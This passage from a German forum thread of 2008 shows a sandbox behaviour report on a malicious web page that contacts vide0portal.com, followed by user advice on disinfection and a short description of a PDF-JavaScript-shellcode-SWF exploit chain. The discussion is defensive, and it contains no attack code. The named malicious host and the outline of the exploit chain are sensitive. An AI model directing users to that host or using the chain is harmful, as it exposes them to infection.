    Key: [ HKU\S-1-5-21-1343024091-1292428093-1606980848-500\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders ],
    Value Name: [ Personal ], Value: [ %USERPROFILE%\Eigene Dateien ], 1 time


    [===]
    2.b) iexplore.exe - File Activities
    [===]
    [=-=]
    Files Created:
    [=-=]
    File Name: [ C:\Dokumente und Einstellungen\Administrator\Lokale Einstellungen\Temporary Internet Files\Content.IE5\CHT2SY0U\index[1].htm ]

    [=-=]
    Files Read:
    [=-=]
    File Name: [ PIPE\svcctl ]

    [=-=]
    Files Modified:
    [=-=]
    File Name: [ C:\Dokumente und Einstellungen\Administrator\Lokale Einstellungen\Temporary Internet Files\Content.IE5\CHT2SY0U\index[1].htm ]
    File Name: [ PIPE\svcctl ]
    File Name: [ \Device\Afd\Endpoint ]

    [=-=]
    Device Control Communication:
    [=-=]
    File: [ \Device\KsecDD ], Control Code: [ 0x00390008 ], 8 times
    [=-=]
    Memory Mapped Files:
    [=-=]
    File Name: [ C:\Programme\Java\jre1.6.0_07\bin\MSVCR71.dll ]
    File Name: [ C:\Programme\Java\jre1.6.0_07\bin\ssv.dll ]
    File Name: [ C:\WINDOWS\System32\BROWSEUI.dll ]
    File Name: [ C:\WINDOWS\System32\CLBCATQ.DLL ]
    File Name: [ C:\WINDOWS\System32\COMRes.dll ]
    File Name: [ C:\WINDOWS\System32\CSCDLL.dll ]
    File Name: [ C:\WINDOWS\System32\DNSAPI.dll ]
    File Name: [ C:\WINDOWS\System32\IMM32.DLL ]
    File Name: [ C:\WINDOWS\System32\MSCTF.dll ]
    File Name: [ C:\WINDOWS\System32\MSLS31.DLL ]
    File Name: [ C:\WINDOWS\System32\NETAPI32.dll ]
    File Name: [ C:\WINDOWS\System32\RASAPI32.DLL ]
    File Name: [ C:\WINDOWS\System32\SETUPAPI.dll ]
    File Name: [ C:\WINDOWS\System32\SXS.DLL ]
    File Name: [ C:\WINDOWS\System32\Secur32.dll ]
    File Name: [ C:\WINDOWS\System32\TAPI32.dll ]
    File Name: [ C:\WINDOWS\System32\UxTheme.dll ]
    File Name: [ C:\WINDOWS\System32\WINMM.dll ]
    File Name: [ C:\WINDOWS\System32\WS2HELP.dll ]
    File Name: [ C:\WINDOWS\System32\WS2_32.dll ]
    File Name: [ C:\WINDOWS\System32\browselc.dll ]
    File Name: [ C:\WINDOWS\System32\cscui.dll ]
    File Name: [ C:\WINDOWS\System32\jscript.dll ]
    File Name: [ C:\WINDOWS\System32\mlang.dll ]
    File Name: [ C:\WINDOWS\System32\msimtf.dll ]
    File Name: [ C:\WINDOWS\System32\rasadhlp.dll ]
    File Name: [ C:\WINDOWS\System32\rasman.dll ]
    File Name: [ C:\WINDOWS\System32\rtutils.dll ]
    File Name: [ C:\WINDOWS\System32\sensapi.dll ]
    File Name: [ C:\WINDOWS\System32\shdoclc.dll ]
    File Name: [ C:\WINDOWS\System32\shfolder.dll ]
    File Name: [ C:\WINDOWS\System32\winrnr.dll ]
    File Name: [ C:\WINDOWS\System32\wshtcpip.dll ]
    File Name: [ C:\WINDOWS\System32\wsock32.dll ]
    File Name: [ C:\WINDOWS\system32\WININET.dll ]
    File Name: [ C:\WINDOWS\system32\mswsock.dll ]
    File Name: [ C:\WINDOWS\system32\urlmon.dll ]

    [===]
    2.c) iexplore.exe - Process Activities
    [===]
    [=-=]
    Thread Overview:
    [=-=]
    After 125 seconds, Number of threads: 1


    [===]
    2.d) iexplore.exe - Network Activities
    [===]
    [=-=]
    DNS Queries:
    [=-=]
    Name: [ vide0portal.com ], Query Type: [ DNS_TYPE_A ],
    Query Result: [ 58.241.255.34 ], Successful: [ 1 ], Protocol: [ ]

    [=-=]
    HTTP Conversations:
    [=-=]
    From ANUBIS:1034 to 58.241.255.34:80 - [ vide0portal.com ]
    Request: [ GET /news/index.php ], Response: [ 200 "OK" ]
    [=-]
    2.e) iexplore.exe - Other Activities
    [=-=]
    Mutexes Created:
    [=-=]
    Mutex: [ MSCTF.Shared.MUTEX.AFF ]
    Mutex: [ MSCTF.TimListMUTEX. ]
    Mutex: [ MSUIM.Assembly.Mutex ]
    Mutex: [ MSUIM.GlobalCompartment.Mutex ]
    Mutex: [ MSUIM.GlobalLangBarEventSink.Mutex ]
    Mutex: [ MSUIM.Layouts.Mutex ]
    Mutex: [ MSUIM.MarshalInterfaceMutex.TMD ]
    Mutex: [ ZonesCacheCounterMutex ]
    Mutex: [ ZonesCounterMutex ]
    [=-=]
    Keyboard Keys Monitored:
    [=-=]
    Virtual Key Code: [ VK_CONTROL (17) ], 18 times
    Virtual Key Code: [ VK_ESCAPE (27) ], 22 times
    Virtual Key Code: [ VK_SHIFT (16) ], 17 times
    Virtual Key Code: [ VK_MENU (18) ], 17 times
    Virtual Key Code: [ VK_LSHIFT (160) ], 12 times
    Virtual Key Code: [ VK_LCONTROL (162) ], 12 times
    Virtual Key Code: [ VK_LMENU (164) ], 12 times
    Virtual Key Code: [ VK_LBUTTON (1) ], 64 times
    Virtual Key Code: [ VK_RBUTTON (2) ], 5 times
    Virtual Key Code: [ VK_MBUTTON (4) ], 5 times

    hut ab vor dem, der die seite erstellt hat.

    der spoiler beschreibt, was passiert wenn man mit dem IE darauf surft und in keiner weise geschützt ist.

    meine empfehlung, eaktiviert javascript und java !!! und arbeitet NICHT mit admin rechten.

    dann ist diese seite ziemlich nutzlos.

    was aber, wenn ihr doch auf der seite wart?
    sucht manuell mit einem vom windows system unabhängigen dateimanager
    -> so etwas findet ihr in "icesword" oder in einer windows pe oder linux boot cd
    nach den dateien, die im spoiler aufgeführt sind, sichert die dateien und prüft jede der dateien auf jotti oder virustotal. ...
     
  22. #21 30. Dezember 2008
    AW: Infizierte php geöffnet kann einer sich das mal anschauen xD

    nope, du bekommst ne pdf -> in dieser is javascript-code -> dieser code nutzt ne lücke und führt shellcode aus (denk ich ma) -> es wird ne swf nachgeladen mit weiteren exploits

    also bringt dir ausgeschaltetes java oder javascript in dem fall überhaupt nix.
     

  23. Videos zum Thema
Die Seite wird geladen...